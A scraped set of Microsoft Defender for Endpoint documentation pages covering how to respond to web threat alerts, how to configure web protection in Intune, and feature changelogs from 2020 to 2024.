------- m365-security-- tier2-- mde-asr-- Previously updated : 12/18/2020--
-# Respond to web threats
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-main-abovefoldlink&rtc=1)
-
-Web protection in Microsoft Defender for Endpoint lets you efficiently investigate and respond to alerts related to malicious websites and websites in your custom indicator list.
-
-## View web threat alerts
-
-Microsoft Defender for Endpoint generates the following [alerts](manage-alerts.md) for malicious or suspicious web activity:
--- **Suspicious connection blocked by network protection**: This alert is generated when network protection (in block mode) stops an attempt to access a malicious website or a website in your custom indicator list.-- **Suspicious connection detected by network protection**: This alert is generated when network protection (in audit mode) detects an attempt to access a malicious website or a website in your custom indicator list.-
-Each alert provides the following information:
--- Device that attempted to access the blocked website-- Application or program used to send the web request-- Malicious URL or URL in the custom indicator list-- Recommended actions for responders--
-> [!NOTE]
-> To reduce the volume of alerts, Microsoft Defender for Endpoint consolidates web threat detections for the same domain on the same device each day to a single alert. Only one alert is generated and counted into the [web protection report](web-protection-monitoring.md).
-
-## Inspect website details
-
-You can dive deeper by selecting the URL or domain of the website in the alert. This opens a page about that particular URL or domain with various information, including:
--- Devices that attempted to access website-- Incidents and alerts related to the website-- How frequent the website was seen in events in your organization-
- :::image type="content" source="media/wtp-website-details.png" alt-text="The domain or URL entity details page" lightbox="media/wtp-website-details.png":::
-
-For more information, see [About URL or domain entity pages](investigate-domain.md).
-
-## Inspect the device
-
-You can also check the device that attempted to access a blocked URL. Selecting the name of the device on the alert page opens a page with comprehensive information about the device.
-
-For more information, see [About device entity pages](investigate-machines.md).
-
-## Web browser and Windows notifications for end users
-
-With web protection in Defender for Endpoint, your end users are prevented from visiting malicious or unwanted websites using Microsoft Edge or other browsers. Because blocking is done by [network protection](network-protection.md) and not their web browser, users see a generic error from the web browser. They also see a notification from Windows.
--
-*Web threat blocked on Microsoft Edge*
-
-*Web threat blocked on Chrome*
-
-## Related articles
--- [Web protection overview](web-protection-overview.md)-- [Web content filtering](web-content-filtering.md)-- [Web threat protection](web-threat-protection.md)-- [Monitor web security](web-protection-monitoring.md)
security Web Threat Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/web-threat-protection.md
- Title: Protect your organization against web threats
-description: Learn about web protection in Microsoft Defender for Endpoint and how it can protect your organization.
--- Previously updated : 08/22/2022---- m365-security-- tier2-- mde-asr----
-# Protect your organization against web threats
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-main-abovefoldlink&rtc=1)
-
-Web threat protection is part of [Web protection](web-protection-overview.md) in Defender for Endpoint. It uses [network protection](network-protection.md) to secure your devices against web threats. By integrating with Microsoft Edge and popular third-party browsers like Chrome and Firefox, web threat protection stops web threats without a web proxy and can protect devices while they're away or on premises. Web threat protection stops access to phishing sites, malware vectors, exploit sites, untrusted or low-reputation sites, and sites that you are blocked because they're in your [custom indicator list](manage-indicators.md).
-
-> [!NOTE]
-> It might take up to two hours for devices to receive new custom indicators.
-
-## Prerequisites
-
-Web protection uses network protection to provide web browsing security on Microsoft Edge and non-Microsoft web browsers.
-
-To turn on network protection on your devices:
--- Edit the Defender for Endpoint security baseline under **Web & Network Protection** to enable network protection before deploying or redeploying it. [Learn about reviewing and assigning the Defender for Endpoint security baseline](configure-machines-security-baseline.md#review-and-assign-the-microsoft-defender-for-endpoint-security-baseline)-- Turn network protection on using Intune device configuration, SCCM, Group Policy, or your MDM solution. [Read more about enabling network protection](enable-network-protection.md)-
-> [!NOTE]
-> If you set network protection to **Audit only**, blocking will be unavailable. Also, you will be able to detect and log attempts to access malicious and unwanted websites on Microsoft Edge only.
-
-## Configure web threat protection
-
-The following procedure describes how to configure web threat protection using the Microsoft Intune admin center.
-
-1. Go to the Microsoft Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)), and sign in.
-
-2. Choose **Endpoint security** \> **Attack surface reduction**, and then choose **+ Create policy**.
-
-3. Select a platform, such as **Windows 10 and later**, select the **Web protection** profile, and then choose **Create**.
-
-4. On the **Basics** tab, specify a name and description, and then choose **Next**.
-
-5. On the **Configuration settings** tab, expand **Web Protection**, specify your settings, and then choose **Next**.
-
- - Set **Enable network protection** to **Enabled** so web protection is turned on. Alternately, you can set network protection to **Audit mode** to see how it works in your environment. In audit mode, network protection doesn't prevent users from visiting sites or domains, but it does track detections as events.
- - To protect users from potential phishing scams and malicious software, turn **Require SmartScreen for Microsoft Edge Legacy** to **Yes**.
- - To prevent users from bypassing warnings about potentially malicious sites, set **Block malicious site access** to **Yes**.
- - To prevent users from bypassing the warnings and downloading unverified files, set **Block unverified file download** to **Yes**.
-
-6. On the **Scope tags** tab, if your organization is using scope tags, choose **+ Select scope tags**, and then choose **Next**. (If you aren't using scope tags, choose **Next**.) To learn more about scope tags, see [Use role-based access control (RBAC) and scope tags for distributed IT](/mem/intune/fundamentals/scope-tags).
-
-7. On the **Assignments** tab, specify the users and devices to receive the web protection policy, and then choose **Next**.
-
-8. On the **Review + create** tab, review your policy settings, and then choose **Create**.
-
-## Related articles
--- [Web protection overview](web-protection-overview.md)-- [Web threat protection](web-threat-protection.md)-- [Monitor web security](web-protection-monitoring.md)-- [Respond to web threats](web-protection-response.md)-- [Network protection](network-protection.md)
security Whats New In Microsoft Defender Endpoint https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/whats-new-in-microsoft-defender-endpoint.md
- Title: What's new in Microsoft Defender for Endpoint
-description: See what features are generally available (GA) in the latest release of Microsoft Defender for Endpoint, and security features in Windows 10 and Windows Server.
---- Previously updated : 04/09/2024---- m365-security-- tier1---
-# What's new in Microsoft Defender for Endpoint
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
-
-The following features are in preview or generally available (GA) in the latest release of Microsoft Defender for Endpoint.
-
-For more information on preview features, see [Preview features](preview.md).
-
-For more information on what's new with Microsoft Defender for Endpoint on Windows, see:
-[What's new in Microsoft Defender for Endpoint on Windows](windows-whatsnew.md)
-
-For more information on what's new with other Microsoft Defender security products, see:
--- [What's new in Microsoft Defender XDR](../defender/whats-new.md)-- [What's new in Microsoft Defender for Office 365](../office-365-security/defender-for-office-365-whats-new.md)-- [What's new in Microsoft Defender for Identity](/defender-for-identity/whats-new)-- [What's new in Microsoft Defender for Cloud Apps](/cloud-app-security/release-notes)-
-For more information on Microsoft Defender for Endpoint on specific operating systems:
--- [What's new in Defender for Endpoint on Windows](windows-whatsnew.md)-- [What's new in Defender for Endpoint on macOS](mac-whatsnew.md)-- [What's new in Defender for Endpoint on Linux](linux-whatsnew.md)-- [What's new in Defender for Endpoint on Android](android-whatsnew.md)-- [What's new in Defender for Endpoint on iOS](ios-whatsnew.md)-
-## April 2024
-
-**Microsoft Defender for Endpoint on macOS** feature now in GA:
--- **Troubleshooting mode for macOS** : Troubleshooting mode helps you identify instances where antivirus might be causing issues with your applications or system resources. To learn more, see [Troubleshooting mode in Microsoft Defender for Endpoint on macOS](mac-troubleshoot-mode.md).-
-## (GA) March 2024
-
-**Built-in Scheduled scan for macOS**: For information on Scheduled Scan built-in for Microsoft Defender for Endpoint on macOS, see [How to schedule scans with Microsoft Defender for Endpoint on macOS](mac-schedule-scan.md)
-
-## February 2024
-
-**Attack Surface Reduction (ASR) Rules**
-
-Two new ASR rules are now in public preview:
-- [Block rebooting machine in Safe Mode (preview)](/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-rebooting-machine-in-safe-mode-preview): This rule prevents the execution of commands to restart machines in Safe Mode.-- [Block use of copied or impersonated system tools (preview)](/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-use-of-copied-or-impersonated-system-tools-preview): This rule blocks the use of executable files that are identified as copies of Windows system tools. These files are either duplicates or impostors of the original system tools.-
-**Microsoft Defender for Endpoint on macOS** features are in public preview:
--- **Built-in Scheduled Scan for macOS** (preview): Scheduled Scan built-in for Microsoft Defender for Endpoint on macOS is now available in public preview. To learn more, see [How to schedule scans with Microsoft Defender for Endpoint on macOS](mac-schedule-scan.md).--- **Troubleshooting mode for macOS** (preview): Troubleshooting mode for macOS is now available in public preview. Troubleshooting mode helps you identify instances where antivirus might be causing issues with your applications or system resources. To learn more, see [Troubleshooting mode in Microsoft Defender for Endpoint on macOS](mac-troubleshoot-mode.md).-
-## January 2024
--- **Defender Boxed is available for a limited period of time**. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. Take a moment to celebrate your organization's improvements in security posture, overall response to detected threats (manual and automatic), blocked emails, and more. -
- - Defender Boxed opens automatically when you go to the **Incidents** page in the Microsoft Defender portal.
- - If you close Defender Boxed and you want to reopen it, in the Microsoft Defender portal, go to **Incidents**, and then select **Your Defender Boxed**.
- - Act quickly! Defender Boxed is available only for a short period of time.
-- (GA) [User Contain](https://www.microsoft.com/en-us/security/blog/2023/10/11/microsoft-defender-for-endpoint-now-stops-human-operated-attacks-on-its-own) can now contain compromised users automatically stopping Human Operated Ransomware in its track using [Automatic Attack Disruption](/microsoft-365/security/defender/automatic-attack-disruption).--
-## November 2023
--- [Microsoft Defender Core service overview](microsoft-defender-core-service-overview.md) is now available for consumers and is planned to begin rolling out to enterprise customers in early 2024.-- The [Microsoft Defender for Endpoint plug-in for Windows Subsystem for Linux (WSL)](/microsoft-365/security/defender-endpoint/mde-plugin-wsl) is now available in public preview.-- Support for [mixed-license scenarios](defender-endpoint-subscription-settings.md) is now generally available in Defender for Endpoint.-
-## October 2023
--- (GA) The device isolation and run AV scan responses in macOS and Linux are now generally available. You can now remotely [run an AV scan](respond-machine-alerts.md#run-microsoft-defender-antivirus-scan-on-devices) or [isolate devices](respond-machine-alerts.md#isolate-devices-from-the-network) when responding to attacks.-- (Public Preview) [Streamlined device connectivity for Defender for Endpoint](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-a-streamlined-device-connectivity-experience-for/ba-p/3956236) is available in public preview for Windows, macOS, and Linux. This experience makes it easier to configure and manage Defender for Endpoint services by reducing the number of URLs required for connectivity, providing IP & Azure service tag support, and simplifying post-deployment network management.-- (Public Preview) [User Contain](https://www.microsoft.com/en-us/security/blog/2023/10/11/microsoft-defender-for-endpoint-now-stops-human-operated-attacks-on-its-own) can now contain compromised users automatically stopping Human Operated Ransomware in its track using Automatic Attack Disruption.-
-## September 2023
-
-(GA) The [Protecting Dev Drive using performance mode](microsoft-defender-endpoint-antivirus-performance-mode.md) is now generally available. The goal of Performance mode is to improve functional performance for developers who use Windows 11. Performance mode which reduces the performance impact of Microsoft Defender Antivirus scans for files stored on designated Dev Drive.
-
-## August 2023
--- (GA) The [Monthly security summary report](monthly-security-summary-report.md) is now generally available. The report helps organizations get a visual summary of key findings and overall preventative actions taken to enhance the organization's overall security posture completed in the last month. -
-## July 2023
--- The eBPF-based sensor for Microsoft Defender for Endpoint on Linux is available for public preview on all supported Linux devices. For more information, see [Use eBPF-based sensor for Microsoft Defender for Endpoint on Linux](linux-support-ebpf.md).-- [Manage endpoint security policies in Defender for Endpoint is now in public preview](manage-security-policies.md) <br> You can now configure security settings directly in Microsoft Defender XDR.-- A new file page is now available in Defender for Endpoint. The file page now includes information like file details and file content and capabilities. For more information, see [Investigate files](investigate-files.md).
-
-## June 2023
--- Microsoft Defender Antivirus scan response action is supported for macOS and Linux for client version 101.98.84 and above. It is in preview. See [Run Microsoft Defender Antivirus scan on devices](respond-machine-alerts.md#run-microsoft-defender-antivirus-scan-on-devices). -- Isolating devices from the network is supported for macOS for client version 101.98.84 and above. It is in preview. See [Isolate devices from the network](respond-machine-alerts.md#isolate-devices-from-the-network).-- Forcibly releasing devices from isolation is now available for public preview. This new capability allows you to forcibly release devices from isolation, when isolated devices become unresponsive. For more information, see [Forcibly release device from isolation](respond-machine-alerts.md#forcibly-release-device-from-isolation).-
-## May 2023
--- Performance mode for Microsoft Defender Antivirus is now available for public preview. This new capability provides asynchronous scanning on a Dev Drive, and doesn't change the security posture of your system drive or other drives. For more information, see [Protecting Dev Drive using performance mode](microsoft-defender-endpoint-antivirus-performance-mode.md).-
-## March 2023
--- Support for mixed-licensing scenarios is now in preview! With these capabilities, you can [Manage Microsoft Defender for Endpoint subscription settings across client devices (preview!)](defender-endpoint-subscription-settings.md).-
-## February 2023
-
-- The Microsoft Defender for Identity integration toggle is now removed from the Microsoft Defender for Endpoint Settings > Advanced features page. Because Defender for Identity is now integrated with Microsoft Defender XDR, this toggle is no longer required. You don't need to manually configure integration between services. See [What's new - Microsoft Defender for Identity](/defender-for-identity/whats-new#defender-for-identity-release-2194).-
-## January 2023
--- [Tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) can now protect exclusions when deployed with Microsoft Intune. See [Protect Microsoft Defender Antivirus exclusions from tampering](prevent-changes-to-security-settings-with-tamper-protection.md#protect-microsoft-defender-antivirus-exclusions)--- Live Response is now generally available for macOS and Linux. For more information, see [Investigate entities on devices using live response](live-response.md).--- [Live response API and library API for Linux and macOS is now generally available](run-live-response.md) <br/> You can now run live response API commands on Linux and macOS.-
-## Prior to 2023
-
-For information about features released prior to 2023, see [Archive - What's new in Defender for Endpoint, December 2022 and earlier](whats-new-mde-archive.md#whats-new-in-microsoft-defender-for-endpointbefore-2023)
security Whats New Mde Archive https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/whats-new-mde-archive.md
- Title: What's new in Microsoft Defender for Endpoint - Before 2023
-description: See what features were available for Microsoft Defender for Endpoint in the releases before 2023.
--- Previously updated : 03/25/2024---- m365-security-- tier1---
-# What's new in Microsoft Defender for Endpoint - Before 2023
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft 365 Defender](https://go.microsoft.com/fwlink/?linkid=2118804)-
-The following features were in preview or generally available (GA) in Microsoft Defender for Endpoint prior to the calendar year 2023.
-
-For more information on preview features, see [Preview features](preview.md).
-
-For more information on what's new with Microsoft Defender for Endpoint on Windows, see:
-[What's new in Microsoft Defender for Endpoint on Windows](windows-whatsnew.md)
-
-For more information on what's new with other Microsoft Defender security products, see:
--- [What's new in Microsoft Defender XDR](../defender/whats-new.md)-- [What's new in Microsoft Defender for Office 365](../office-365-security/defender-for-office-365-whats-new.md)-- [What's new in Microsoft Defender for Identity](/defender-for-identity/whats-new)-- [What's new in Microsoft Defender for Cloud Apps](/cloud-app-security/release-notes)-
-For more information on Microsoft Defender for Endpoint on specific operating systems and on other operating systems:
--- [What's new in Defender for Endpoint on Windows](windows-whatsnew.md)-- [What's new in Defender for Endpoint on macOS](mac-whatsnew.md)-- [What's new in Defender for Endpoint on Linux](linux-whatsnew.md)-- [What's new in Defender for Endpoint on Android](android-whatsnew.md)-- [What's new in Defender for Endpoint on iOS](ios-whatsnew.md)-
-## December 2022
--- Microsoft Defender for Endpoint Device control removable storage access control updates:-
- 1. Microsoft Intune support for removable storage access control is now available. See [Deploy and manage device control with Intune](device-control-deploy-manage-intune.md).
-
- 2. The new default enforcement policy of removable storage access control is designed for all device control features. Printer Protection is now available for this policy. If you create a Default Deny policy, printers will be blocked in your organization.
-
- - Intune: *./Vendor/MSFT/Defender/Configuration/DefaultEnforcement* <br> See [Deploy and manage device control using Intune](device-control-deploy-manage-intune.md)
-
- - Group policy: *Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Features > Device Control > Select Device Control Default Enforcement*<br> See [Deploy and manage device control with Group Policy](device-control-deploy-manage-gpo.md)
--- Microsoft Defender for Endpoint Device control New Printer Protection solution to manage printer is now available. For more information, see [Device control policies](device-control-policies.md).-
-## November 2022
--- [Built-in protection](built-in-protection.md) is now generally available. Built-in protection helps protect your organization from ransomware and other threats with default settings that help ensure that your devices are protected.-
-## October 2022
-
-[Network protection C2 detection and remediation is now generally available](network-protection.md#block-command-and-control-attacks). <br/>Attackers often compromise existing internet-connected servers to become their command and control servers. Attackers can use the compromised servers to hide malicious traffic and deploy malicious bots that are used to infect endpoints. Network protection detection and remediation helps improve the time it takes for the security operations (SecOps) teams to pinpoint and respond to malicious network threats that are looking to compromise endpoints.
-
-## September 2022
--- [Attack surface reduction rules report now available in the Microsoft Defender portal](attack-surface-reduction-rules-report.md). <br/>The attack surface reduction rules report is now available in the Microsoft Defender portal. This ASR report provides information about the attack surface reduction rules that are applied to devices in your organization and helps you detect threats, block potential threats, and get visibility into ASR and device configuration.--- [Built-in protection](built-in-protection.md) (preview) is rolling out. Built-in protection is a set of default settings, such as tamper protection turned on, to help protect devices from ransomware and other threats.--- [Device health reporting is now generally available](device-health-reports.md). <br/>The device health report provides information about the health and security of your endpoints. The report includes trending information showing the sensor health state, antivirus status, OS platforms, Windows 10 versions, and Microsoft Defender Antivirus update versions.--- [Device health reporting is now available for US Government customers using Defender for Endpoint](device-health-reports.md). <br/>Device health reporting is now available for GCC, GCC High, and DoD customers.--- [Troubleshooting mode](enable-troubleshooting-mode.md) is now available for more Windows operating systems, including Windows Server 2012 R2 and higher. For more information about the required updates, see [Troubleshooting mode](enable-troubleshooting-mode.md).-
-## August 2022
--- [Device health status](investigate-machines.md#device-health-status)<br>The Device health status card shows a summarized health report for the specific device.--- [Device health reporting (Preview)](/microsoft-365/security/defender-endpoint/machine-reports)<br> The devices status report provides high-level information about the devices in your organization. The report includes trending information showing the sensor health state, antivirus status, OS platforms, and Windows 10 versions.--- [Tamper protection on macOS is now generally available](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/tamper-protection-on-macOS-is-now-generally-available/ba-p/3595422)<br> This feature will be released with audit mode enabled by default, and you can decide whether to enforce (block) or turn off the capability. Later this year, we'll offer a gradual rollout mechanism that will automatically switch endpoints to "block" mode; this mechanism applies only if you haven't made a choice to either enable ("block" mode) or disable the capability.--- [Network Protection and Web Protection for macOS and Linux is now in Public Preview!](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/network-protection-and-web-protection-for-macOS-and-linux-is-now/ba-p/3601576)<br>Network Protection helps reduce the attack surface of your devices from Internet-based events. It prevents employees from using any application to access dangerous domains that may host phishing scams, exploits, and other malicious content on the Internet. It's the foundation on which our Web Protection for Microsoft Defender for Endpoint is built. These capabilities include Web threat protection, Web content filtering, and IP/URL Custom indicators. Web protection enables you to secure your devices against web threats and helps to regulate unwanted content.--- [Improved Microsoft Defender for Endpoint onboarding for Windows Server 2012 R2 and Windows Server 2016](/mem/configmgr/core/plan-design/changes/whats-new-in-version-2207#improved-microsoft-defender-for-endpoint-mde-onboarding-for-windows-server-2012-r2-and-windows-server-2016)<br>Configuration Manager version 2207 now supports automatic deployment of modern, unified Microsoft Defender for Endpoint for Windows Server 2012 R2 & 2016. Devices running Windows Server 2012 R2 or Windows Server 2016 that are targeted by the Defender for Endpoint onboarding policy now use the unified agent instead of the Microsoft Monitoring Agent-based solution, if configured through client settings.-
-## July 2022
--- [Add domain controller devices - Evaluation lab enhancement](evaluation-lab.md#add-a-domain-controller)<br>Now generally available - Add a domain controller to run complex scenarios such as lateral movement and multistage attacks across multiple devices.--- [Announcing File page enhancements in Microsoft Defender for Endpoint](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-file-page-enhancements-in-microsoft-defender-for/ba-p/3584004)<br>Have you ever investigated files in Microsoft Defender for Endpoint? We now make it even easier with our recent announcement of enhancements to the File page and side panel. Users can now streamline processes by having a more efficient navigation experience that hosts all this information in one place.--- [Introducing the new alert suppression experience](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/introducing-the-new-alert-suppression-experience/ba-p/3562719)<br>We're excited to share that the new and advanced alert suppression experience is now Generally Available. The new experience provides tighter granularity and control, allowing users to tune Microsoft Defender for Endpoint alerts.--- [Prevent compromised unmanaged devices from moving laterally in your organization with "Contain](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/prevent-compromised-unmanaged-devices-from-moving-laterally-in/ba-p/3482134)<br>Starting today, when a device that isn't enrolled in Microsoft Defender for Endpoint is suspected of being compromised, as an SOC analyst, you'll be able to "Contain" it. As a result, any device enrolled in Microsoft Defender for Endpoint will now block any incoming/outgoing communication with the suspected device.--- [Mobile device support is now available for US Government Customers using Defender for Endpoint](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/mobile-device-support-is-now-available-for-us-government/ba-p/3472590)<br>Microsoft Defender for Endpoint for US Government customers is built in the Azure US Government environment and uses the same underlying technologies as Defender in Azure Commercial. This offering is available to GCC, GCC High, and DoD customers, and it further extends our platform availability from Windows, macOS, and Linux, to Android and iOS devices.-
-## June 2022
--- [Defender for Servers Plan 2 now integrates with MDE unified solution](https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/defender-for-servers-plan-2-now-integrates-with-mde-unified/ba-p/3527534)<br>You can now start deploying the modern, unified solution for Windows Server 2012 R2 and 2016 to servers covered by Defender for Servers Plan 2, using a single button.--- [Mobile Network Protection in Microsoft Defender for Endpoint on Android & iOS now in Public Preview](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/mobile-network-protection-in-microsoft-defender-for-endpoint-on/ba-p/3559121)<br>Microsoft offers a mobile network protection feature in Defender for Endpoint that helps organizations identify, assess, and remediate endpoint weaknesses with the help of robust threat intelligence. We're delighted to announce that users can now benefit from this new feature on both Android and iOS platforms that have Microsoft Defender for Endpoint.--
-## October 2021
--- [Updated onboarding and feature parity for Windows Server 2012 R2 and Windows Server 2016 (preview)](configure-server-endpoints.md)<br> The new unified solution package makes it easier to onboard servers by removing dependencies and installation steps. In addition, this unified solution package comes with many new feature improvements.--- Windows 11 support added to Microsoft Defender for Endpoint and Microsoft 365 Defender.-
-## September 2021
--- [Web content filtering](web-content-filtering.md) . As part of web protection capabilities in Microsoft Defender for Endpoint, web content filtering enables your organization's security team to track and regulate access to websites based on their content categories. Categories include adult content, high bandwidth, legal liability, leisure, and uncategorized. Although many websites that fall into one or more of these categories might not be malicious, they could be problematic because of compliance regulations, bandwidth usage, or other concerns. [Learn more about web content filtering](web-content-filtering.md).-
-## August 2021
--- [Microsoft Defender for Endpoint Plan 1 ](defender-endpoint-plan-1.md) (preview). Defender for Endpoint Plan 1 (preview) is an endpoint protection solution that includes next-generation protection, attack surface reduction, centralized management and reporting, and APIs. Defender for Endpoint Plan 1 (preview) is a new offering for customers who:
- - Want to try our endpoint protection capabilities
- - Have Microsoft 365 E3, and
- - Don't yet have Microsoft 365 E5
-
- For more information on Defender for Endpoint Plan 1 (preview), see [Microsoft Defender for Endpoint Plan 1 (preview)](defender-endpoint-plan-1.md).
-
- Existing [Defender for Endpoint](microsoft-defender-endpoint.md) capabilities will be known as Defender for Endpoint Plan 2.
--- (Preview) [Web Content Filtering](web-content-filtering.md)<br> Web content filtering is part of web protection capabilities in Microsoft Defender for Endpoint. It enables your organization to track and regulate access to websites based on their content categories. Many of these websites, while not malicious, might be problematic because of compliance regulations, bandwidth usage, or other concerns.-
-## June 2021
--- [Delta export software vulnerabilities assessment](get-assessment-methods-properties.md#31-methods) API <br> An addition to the [Export assessments of vulnerabilities and secure configurations](get-assessment-methods-properties.md) API collection. <br> Unlike the full software vulnerabilities assessment (JSON response) - which is used to obtain an entire snapshot of the software vulnerabilities assessment of your organization by device - the delta export API call is used to fetch only the changes that have happened between a selected date and the current date (the "delta" API call). Instead of getting a full export with a large amount of data every time, you'll only get specific information on new, fixed, and updated vulnerabilities. Delta export API call can also be used to calculate different KPIs such as "how many vulnerabilities were fixed" or "how many new vulnerabilities were added to an organization."--- [Export assessments of vulnerabilities and secure configurations](get-assessment-methods-properties.md) API <br> Adds a collection of APIs that pull threat and vulnerability management data on a per-device basis. There are different API calls to get different types of data: secure configuration assessment, software inventory assessment, and software vulnerabilities assessment. Each API call contains the requisite data for devices in your organization.--- [Remediation activity](get-remediation-methods-properties.md) API <br> Adds a collection of APIs with responses that contain threat and vulnerability management remediation activities that have been created in your tenant. Response information types include one remediation activity by ID, all remediation activities, and exposed devices of one remediation activity.--- [Device discovery](device-discovery.md) <br> Helps you find unmanaged devices connected to your corporate network without the need for extra appliances or cumbersome process changes. Using onboarded devices, you can find unmanaged devices in your network and assess vulnerabilities and risks. You can then onboard discovered devices to reduce risks associated with having unmanaged endpoints in your network.-
- > [!IMPORTANT]
- > Standard discovery will be the default mode for all customers starting July 19, 2021. You can choose to retain the "basic mode" through the **Settings** page.
--- [Device group definitions](/microsoft-365/security/defender-endpoint/machine-groups) can now include multiple values for each condition. You can set multiple tags, device names, and domains to the definition of a single device group.--- [Mobile Application management support](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-new-capabilities-on-android-and-ios/ba-p/2442730) <br> This enhancement enables Microsoft Defender for Endpoint protect an organization's data within a managed application when Intune is being used to manage mobile applications. For more information about mobile application management, see [this documentation](/mem/intune/apps/mam-faq).--- [Microsoft Tunnel VPN integration](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-new-capabilities-on-android-and-ios/ba-p/2442730) <br> Microsoft Tunnel VPN capabilities are now integrated with Microsoft Defender for Endpoint app for Android. This unification enables organizations to offer a simplified end-user experience with one security app ΓÇô offering both mobile threat defense and the ability to access on-prem resources from their mobile device ΓÇô while security and IT teams are able to maintain the same admin experiences they are familiar with.--- [Jailbreak detection on iOS](ios-configure-features.md#conditional-access-with-defender-for-endpoint-on-ios) <br> Jailbreak detection capability in Microsoft Defender for Endpoint on iOS is now generally available. This adds to the phishing protection that already exists. For more information, see [Setup Conditional Access Policy based on device risk signals](ios-configure-features.md#conditional-access-with-defender-for-endpoint-on-ios).-
-## March 2021
-
- [Manage tamper protection using the Microsoft Defender Security Center](manage-tamper-protection-microsoft-365-defender.md#manage-tamper-protection-for-your-organization-using-microsoft-defender-portal) <br> You can manage tamper protection settings on Windows 10, Windows Server 2016, Windows Server 2019, and Windows Server 2022 by using a method called *tenant attach*.
-
-## January 2021
--- [Windows Virtual Desktop](https://azure.microsoft.com/services/virtual-desktop/) <br> Microsoft Defender for Endpoint now adds support for Windows Virtual Desktop.-
-## December 2020
--- [Microsoft Defender for Endpoint on iOS](microsoft-defender-endpoint-ios.md) <br> Microsoft Defender for Endpoint now adds support for iOS. Learn how to install, configure, update, and use Microsoft Defender for Endpoint for iOS.-
-## September 2020
--- [Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md) <br> Microsoft Defender for Endpoint now adds support for Android. In addition to the provisions for you to install, configure, and use Microsoft Defender for Endpoint for Android (introducted in the previous sprint in August 2020), the provision to "update" Microsoft Defender for Endpoint for Android has been introduced in this sprint.--- [Threat and vulnerability management macOS support](tvm-supported-os.md)<br> Threat and vulnerability management for macOS is now in public preview, and will continuously detect vulnerabilities on your macOS devices to help you prioritize remediation by focusing on risk. For more information, see [Microsoft Tech Community blog post](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/microsoft-defender-for-endpoint-adds-depth-and-breadth-to-threat/ba-p/1695824).-
-## August 2020
--- [Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md) <br> Microsoft Defender for Endpoint now adds support for Android. The article [Microsoft Defender for Endpoint on Android](microsoft-defender-endpoint-android.md) enables you learn how to install, configure, and use Microsoft Defender for Endpoint for Android.-
-## July 2020
--- [Create indicators for certificates](manage-indicators.md) <br> Create indicators to allow or block certificates.-
-## June 2020
--- [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) <br> Microsoft Defender for Endpoint now adds support for Linux. This article [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md) enables you learn how to install, configure, update, and use Microsoft Defender for Endpoint for Linux.--- [Attack simulators in the evaluation lab](evaluation-lab.md#threat-simulator-scenarios) <br> Microsoft Defender for Endpoint has partnered with various threat simulation platforms to give you convenient access to test the capabilities of the platform right from within the portal.-
-## April 2020
